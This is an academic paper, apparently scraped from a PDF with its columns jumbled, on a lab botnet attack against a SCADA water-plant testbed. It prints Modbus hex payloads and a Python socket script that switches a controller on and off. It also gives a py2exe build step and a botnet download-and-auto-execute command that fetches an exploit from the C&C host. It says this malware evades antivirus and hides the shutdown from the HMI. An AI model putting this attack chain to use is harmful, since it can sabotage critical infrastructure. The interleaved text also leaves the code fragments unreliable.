Industrial Control System System Security-Malware ...

90 downloads 550 Views 710KB Size Report
Windows Active Directory Protocol. ... execute automatically, we must install at least Python package in the victim. So, we must convert the python program to an.
Industrial Control System System Security-Malware Botnet Detection Albert Sagala*, Rudy Pardosi, Alexander Lumbantobing, Pandapotan Siagian Faculty of Informatics and Electrical Del Institute of Technology Toba Samosir, Indonesia *[email protected]

Abstract— Industrial realize that SCADA System was built without considering the security aspect. It was believe that there will be no attacks go to the SCADA plant using malware, such as botnet. Botnets are now the key platform for many Internet attacks, such as spam, distributed denial-of-service (DDoS), identity theft, and phishing. Most of the current botnet detection approaches work only on specific botnet command and control (C&C) protocols (e.g., IRC) and structures (e.g., centralized), and can become ineffective as botnets change their C&C techniques. In this research, we study vertexnet malware attack on a SCADA Server so that it can identify a SCADA Operator machine. The identification was used by analyzing and comparing process list which is run on the infecting host, so the attacker didn't take the wrong target, taking over the SCADA and sending some command to disrupt or operate the plant or machine, and to identifying of Botnet Vertexnet function and activity. From the experiment conducted, we get result that botnet Vertexnet can identifying SCADA Operator, taking over the server, and the activity can be detected effectively and efficiently. Keywords— SCADA Security, Botnet, Bot Loader, SCADA Tesbed,vertexnet.

I.

INTRODUCTION

Hackers and SCADA Security professionals can take advantage of an online tool (www.shodanhq.com) that facilitates the search for plant SCADA around the world online. It is certainly necessary in anticipation of all parties. The academia, industry and government together to prevent and overcome the attacks on vital infrastructure being managed. In our previous research, “SCADA Network Delineation Plant Assessments”, we have found SCADA network can be sniffed by capture their communication that is not secure enough. And after that we do further research to use secure communication among HMI and Controller, it is “Secured Communication Among HMI and Controller using RC-4 Algorithm and Raspberry Pi”. That research will use RC-4 Algorithm to make encryption for SCADA Communication. Consider that the attack didn’t only take from sniffing type, the attacker will do another attack method, such as DDOS Attack, so we do another research to improving SCADA Network Security, the title is “Improving SCADA Security Using IDS and MikroTik”. The purpose of that research to integrate IDS and MikroTik become one defender for SCADA Network.

In the industrial control system, the operator can perform remote control of a number of plant processes, such as water treatment plants, power plants, nuclear reactors, etc. Function remote control is possible with the communication protocol between the HMI (Human Machine Interface) systems with Controller via SCADA protocol [3]. SCADA communication system applying client-server model as the technology TCP / IP. Client played by a controller, while the server is performed by the operator / engineer with Engineering Workstation machine or machine HMI. Isolated SCADA network is designed with the corporate network or the Internet.

For analyzing botnet activity from network traffic and how to identifying to preventing a botnet attack on SCADA server, we using Wireshark as a data traffic capture that will come in and goes out from SCADA operator. Then we use Network Miner as an analyzing tools to get all information about protocol, function, and malware attack that has infecting the server. The topology will change from the previous paper that we have done in pas months [1], C & C Server will be added to take over the SCADA Operator and give command to SCADA Plant. MikroTik in this research will be act as a identifier of botnet after we determine which port and function of botnet’s activity.

System organized crime committed by the hackers in the cyber world is becoming more sophisticated, the statistics showed that cyber-attacks are increasing and more directed to industrial and government facilities. This increase is of course supported by information technology is developing rapidly.

Botmaster and bot (victim) operate on different communication protocols using various topologies: centralized, distributed hybrid, or randomized. According to their C&C architecture, botnets can be classified as IRC-based, HTTPbased, DNS-based, or Peer to Peer (P2P).

We are grateful thank you for the support from Lab Cyber Security Research Centre of Del Institute of Technology for using SCADA plant to make this experiment feasible. Also to Directorate of Higher Education for supporting the financial with contract number :

Our contribution in this paper is to show the botnet activity that has captured botnet traffic and identifying its communication from victim to C&C Server. Then we have

129/K1.1/LT/2016

done for a solution to improve scada security by detecting the botnet activity by configurating at SNORT rules that has customized to botnet’s function and protocol. The rest of the paper is organized as follows: Section 2 discusses the related work of our research and experimental environment. Section 3 explains the network topology of our system more detail. Section 4 elaborate the result and make an analysis, and we conclude at Section 5. II. EXPERIMENTAL By simulating the malware attack on SCADA server we will see how far that botnet can done in the server of SCADA, what botnet’s function can be detect on server using traffic capture, and how can botnet identify the SCADA Operator as a server (target). in this research we using Botnet Vertexnet because this botnet is user friendly and have small package to spread and infecting the victim. Botnets are a major plague of the Internet [1]. To Internet security, botnets are becoming one of the most serious threats. A botnet is a group of infected machines by malware (bot) under the control of botmaster. Botmaster is commandeered of the botnets and organizing to spying, spreading, attacking or even to destruction purpose. There are many methods that can be used to distribute botnets. In our previous work at [2], the researchers will spread botnets using email spam technique. There are several bot loaders that can be use to generate botnet and setup C&C Server. Based on our previous research at [2], we can say that VertexNet is the best loader from ten (10) bot loaders; because all basic loader functions are supported. The “support” means that loaders has the feature and works well at our test lab. A. SCADA Botnet Topology

The experiment was conducted on a SCADA-Botnet tesbed designed as seen on Figure 1. Attacker command C&C Server to control all host that infected by botnet. Then, attacker send “tasklist” and “netstat –a” command to identify which host that is SCADA Operator’s computer control. After attacker find that computer, attacker send “Download and Auto-Execute” command to the botnet in that computer. The botnet will execute the exploit file to start/stop SCADA Delination Plant. . TABLE 1. DEVICES AND IP ADDRESS Device Name

IP Address

Operating System Windows XP

Device Type Client

SCADA Operator Attacker C&C Server

169.254.213.10 169.254.213.222 169.254.213.101

Kali Linux

Client

Ubuntu 10.04

Sensor

Administrator

169.254.213.5

Server

Water Plant

169.254.213.2

Router MikroTik

169.254.213.1

Security Onion PLC Controller RouterOS RB951

Plant Access Point

B. Setup C&C Server This is the first step for our experimental activity. The best host that we can choose to setup the VertexNet Botnet’s C&C Server is the host that has a task to perform a Web Server (Protocol HTTP) with default port is 80, because C&C architecture of VertexNet Botnet is HTTP-based. C. Infection Host At this research, the researchers will use email spam technique to spread botnets. In our scenario, the administrator of SCADA SYSTEM opens the email, download and execute the botnet file that attached in email. At our research, there are four host that infected by the botnet. On this scenario, there are three (3) hosts as computer at Workstation Network, and one (1) host as SCADA Operator’s computer control.

Fig. 2. List Protocol That Used by SCADA Operator as Victim

Fig. 1. Topology that will be an area of hacker’s activities to sending command to the target

D. Monitoring Victim’s Activity When all host in network has been infected, the botmaster must find the host that used as SCADA Operator’s computer control. The objective is, when that host is controlled by bot, botmaster is one step ahead to take over SCADA Delineation Plant. Botmaster can use “tasklist” and “netstat -a” command to check host activity. “tasklist” command can be used to displays a list of currently running processes on either a local

or remote machine. . “netstat -a” command can be use displays protocol statistics and current TCP/IP network connections. E. Identifying SCADA Operator as Victim This is the difference about currently running processes, to decide if that host is SCADA Operator’s computer control, or not.

command control to the network (Microsoft RPC Protocol) and Windows Active Directory Protocol. So, the victim’ machine like the picture is not a SCADA Operator. SCADA Protocol

1) Analyze Process List on Victim’s Activity Fig. 6. Listening Port and Active Connection That Has 502 Port Number on SCADA Operator as Victim Fig. 3. Process List That Running on Non-SCADA Operator as Victim

Picture at the above describe the list process in the victim’s machine that didn’t have any process that describe the HMI Application program. So, the victim’s machine task list like that picture is not a SCADA Operator.

The connection that used by botnet to communicate with C&C Server is TCP Protocol, Local Address is 169.254.213.10:1195, and the Foreign Address is 169.254.213.101:80 (HTTP), as shown by red borders square. The connection that used by SCADA Operator’s computer control to communicate with SCADA Delineation Plant is TCP Protocol, Local Address is 169.254.213.10:1178, and the Foreign Address is 169.254.213.2:502 (ModBus), as shown by green border square. 3) Analyze Modbus Protocol Segment on Wireshark’s Capture

Fig. 4. Process List that Running on SCADA Operator as Victim

At the two picture, we can identify the botnet file is “scadabotnet_C&CServer169.” as shown in red border square and the SCADA HMI’s Application shown with the green border. In the real case of cyber security attack, attacker will rename the botnet file to something that looks like unsuspecting name (such as: systemkernel.exe). We rename out botnet file as look at picture, to proof and confirm that our botnet file has been infected the host, and still running at process silently without GUI. This picture also is the proof that our botnet has been survive and can evade anti-virus detection. At the picture of Running Processes in SCADA Operator’s computer control, as shown in green border square, there are three new process that running. When HMI Control Application running, the main process is PCIMTASK.exe. Then that proses will call “Dbsr.exe” and “ALMH.exe”.

Using wireshark and Network Miner, we can find more accurately the SCADA Operator’s computer control, as described at this image.

Figure 7. Wireshark Data Capture That Contain Modbus Function, read and write coil

F. Take over SCADA Operator’s computer. When the researcher has been find the SCADA Operator’s computer control, the next step is to trying to locate and remote SCADA Delineation Plant, by using file exploits and the last step is to run file exploit at SCADA Operator’s computer, so the investigator/forensic can’t be find evidence about infiltrating in SCADA Network, because the file exploit is sending and execute in SCADA Operator’s computer.

2) Analyze Data Traffic for Protocol Using Netstat

G. Uploading SCADA Command to Turn On/Off SCADA in Stealth Mode To begin give a command to the SCADA Plant, first step to do is make a program that will be sending payload to the controller, in this research we must search the payload of the SCADA Controller to turn on/off actuator by capture in the Wireshark tools, and we found this hexadecimal: Fig. 5. Listening Port and Active Connection on Non-SCADA Operator

Turn On: \x68\x57\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x01 Turn Off:

Picture at the above describe the victim’s machine have normal listening port like the office daily machine, we can see the ‘135’ and ‘445’ port number is windows port to give

\x2c\x7e\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x00

Use that ‘hexadecimal’ in the python program for sending socket to the controller. Will be written like this: #File Name: SCADAOn.py import socket import sys import binascii

The example for the condition where we can use this command is such as urldl::http:// 169.254.213.101/upload/exploit/SCADAOff.sfx.ex e,c:\\\\ SCADAOff.sfx.exe,true

Information that we can gather from this command is: - Botmaster command bot in SCADA Operator’s computer to client_socket=socket.socket(socket.AF_INET, download exploit file that stored at http:// socket.SOCK_STREAM)client_socket.connect(('169.254.213.2', 502)) 169.254.213.101/upload/exploit/SCADAOff. sfx.exe (C&C msg= Server). "\x2c\x7e\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x00" - The exploit file is downloaded at SCADA Operator’s computer in C:\\SCADAOff.sfx.exe def kirim(msg): msg = sys.argv[1] - Because, the value of @Param3 is true, then after the exploit file client_socket.send(msg) downloaded, botnet will auto-execute that file. There is no notify to SCADA Operator’s computer about download is finished. This The different on SCADAOff.py is only the hexa decimal exploit file is special customized to bypass and evade 56 international anti-virus in VirusTotal.com. text in ‘msg’ variable. To turn off the SCAD we use “Turn

Off” Hexa Decimal that we have found H. Convert Python to Exe Program

In victim’s computer, in this case we have found the SCADA Operator’s computer; the operating system that runs is Windows XP. So, if we want to upload the program and execute automatically, we must install at least Python package in the victim. So, we must convert the python program to an Exe program that can run effectively in Windows OS. First step to convert the python, we must download the python plugin, the package’s name is “py2exe”. After we download and install it, we must code one small program to convert the python file to exe windows program. Will be written like this:

- During executing exploit file, there is no GUI, notify, confirmation, and result to SCADA Operator’s computer. The impact of the exploit is to start/stop SCADA Delination Plant without change the status of HMI Control Application. III. RESULT AND DISCUSSION We do testing on the environment that we prepared. The HMI can monitor and control the plant. We add the Intruder to assess the topology proposed. The phase from our research will be described in Figure 8.

from distutils.core import setup import py2exe setup(console=['SCADAOff.py']) Compile it on command prompt using this following result: C:\Users\scyber>python setup.py py2exe running py2exe *** searching for required modules *** *** parsing results *** creating python loader for extension 'unicodedata' (C:\Python27\DLLs\unicodedata .pyd -> unicodedata.pyd)

I. Download and Auto Execute SCADA Command This is the syntax to use ‘Download and AutoExecute command. Syntax command: urldl::@Param1,@Param2,@Param3 Explanation: @Param1 - the url of the file to download. @Param2 - the file path where the url file will be dropped. @Param3 - if botmaster want to execute after download or not {true, false}.

Fig. 8 Botnet Phase to Infecting SCADA System

There are many technic that can be used by attacker to take over SCADA Delineation Plant. At our research, we use spam mail with botnet attachment. Attacker will send spam mail to all employee of company that targeted. Then, unaware employee will download the attachment and open. The botnet is special modify to evade 56 international anti-virus. The infected host will be report to C&C Server and request any task to perform. Attacker order to search the SCADA Operator’s computer control. A. Comparing Status Data Among SCADA Operator – Non Operator

We have done implementing botnet infection on 4 separate host with different Operating System (Windows XP, Windows 7, Windows 8, Windows 10) and we have found that some process list and listening port of each other is different with other purpose (that have function for operator or office function). The aspect to decide the machine is a SCADA operator describe in this table: TABLE 2 PROCESS LIST, LISTENING PORT AND DATA TRAFFIC SCADA’s Aspect

No.

1

Process List

2

Listening Port & Active Connection Data Traffic Have Modbus Command

3

Description

There are PCIM and HMI Application Running on Victim There are Modbus Protocol Active Connection on 502 Port Number The data traffic that has captured By wireshark have Read and Write Coil that one of Modbus Function to give command to the Controller

C. Malware Function for Giving Command to The SCADA Controller In a victim’s machine we try to sending the command for downloading our malware that will be automatically in victim’s machine. And we success to run the program that contain “Turn Off” the controller of SCADA, and the controller have truned off without detection of the Anti-Virus in the victim’s machine. We also can manipulate the HMI Application, that will show the sttaus of the controller still running, but in the real field, the controller have been shut down by the program that executed automatically. The HMI Application in the SCADA Operator shown as the picture in below:

B. Botnet List Function in Victim’s Machine Botnet Vertexnet have customize function that can be executed. There are fourteen (14) commands that can be used by botmaster to control all botnets, as shown on Table 3. Category was ranked based on two priorities (1) How important and how much the impact, if the command works or not?; (2) How often the command used for?. The more important that command, the more CRITICAL the category, but the more often the command used, the more LOW the category. Fig. 9. HMI Application show the controller still running on its interface TABLE 3 COMMAND CATEGORY

IV. CONCLUSION No

Command

Syntax

Category

1

Message Box

msg

Low

2

Get Process List

getproc

Low

3

Get Modules List

getmodule

Low

4

Read a file

readfile

Low

5

Visit Web Page

visitpage

Medium

6

(Un) Active Keylogger

setkeylogger

Medium

7

Get Keylogger Logs

getklogs

Medium

8

File Downloader

urldl

Medium

9

Flood Website

httpflood

High

10

Execute Command

exec

High

11

Remote Shell

remoteshell

High

12

Update Loader

update

Critical

13

Terminate Loader Process

close

Critical

14

Uninstall Loader

uninstall

Critical

Based on our previous research using botnet [16], there are 14 commands which can be used by attacker to command and control their botnets. Every commands were categorized by their command priority. The more important the command, the more priority its categorized. On this research, we use two command: Remote Shell Command “tasklist” and “netstat -a” and Download and Auto Execute Command. There are two specific differences between Non-SCADA Operator and SCADA Operator, they are the existence of HMI Control Application’s that running in the machine. The second is the active connection which listens in 502 port number protocol (ModBus). The last difference is the traffic that contains ModBus Protocol in their network packets and has read or write coil to the SCADA Controller (169.254.213.2). Finally, we can avoid anti-virus detection and manipulate HMI status while we turn on/off controller (plant).

REFERENCES . [1]

[2]

Keith Stouffer, Joe Falco, Karent Kent. 2006. “Guide to Supervisory Control and Data Acquisition (SCADA) and Industrial Control Systems Security “,National Institute of Standards and Technology (NIST) C. Patel, Ganesh D. Bhatt, James H. Graham. 2009. “Improving the Cyber Security of SCADA Communication Networks”, Communication,

Volume 52 Issue 7 Pages 139-142. [3] Yang Y, Power and Energy Society General Meeting (PES), IEEE. 2013. "Intrusion Detection System for IEC 60870-5-104 based SCADA networks". Queen’s University [4] Zouheir Trabelsi, Walid Ibrahim. 2013. "A Hands-on Approach for Teaching Denial of Service Attacks: A Case Study". College of Information Technology [5] Albert Sagala, Deni Lumbantoruan, Epelin Manurung, Iroma Situmorang, Adi Gunawan., IAES. 2015. " Secured Communication Among HMI and Controller Using RC-4 Algorithm and Raspberry Pi", TELKOMNIKA Indonesian Journal of Electrical Engineering Vol 15, No 3 [6] Rohan Chabukswar, Bruno Sinopoli. 2012. "Simulation of Network Atatcks on SCADA Systems". University of California Berkeley [7] Miguel A.Calvo Moya. 2006. “Analysis and Evaluation of the Snort and Bro Network Intrusion Detection Systems”. Universidad Pontificia Comillas [8] Eric D.Knap (2011), “Industrial Network Security: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems”,Syngress Elsevier. [9] Hahn.A,Ashok.A,Sridhar.S (June 2013), "Cyber-Physical Security Sandboxs:Architecture, Application, and Evaluation for Smart Grid", IEEE Transaction on Smart Grid, Vol.4, No.2 [10] J. Falco, J. Gilsinn, K., and Stouffer (2004), "IT Security for Industrial Control Systems: Requirements Specification and Performance Testing,"

[11]

[12]

[13]

[14]

[15]

[16]

2004 NDIA Homeland Security Symposium & Exhibition, Crystal City, VA. Lemay.A, Fernandez.J, Knight.S [2013]. An isolated virtual cluster for SCADA network security research, Proceeding of the 1st International Symposium for ICS &SCADA Cyber Security Research. R.R.RBarbosa, R.Sadre, A.Pras (2012), “A First Look into SCADA Network Traffic”, in IEEE/IFIP Network Operations and Management Symposium (NOMS 2012), Volume 17, page6. Springer. Steven Cheung, et al (2006), “Using Model-based Intrusion Detection for SCADA Networks”, SRI International, Computer Science Laboratory. Giani.A,Sastry.S,Karl H.Johansson, Sandberd H. (2012). The VIKING Project: An Initiative on Resilent Control of Power Networks, KTH University, Sweden. B.Dutertre (October 2006), “Formal modeling and analysis of the Modbus protocol. Technical report, Computer Science Laboratory, SRI International. Sagala, A., Lumbantobing, A.,"Design an advanced botnet to monitor user awareness on harmful malware using VertexNet",Internetworking Indonesia Journal,2016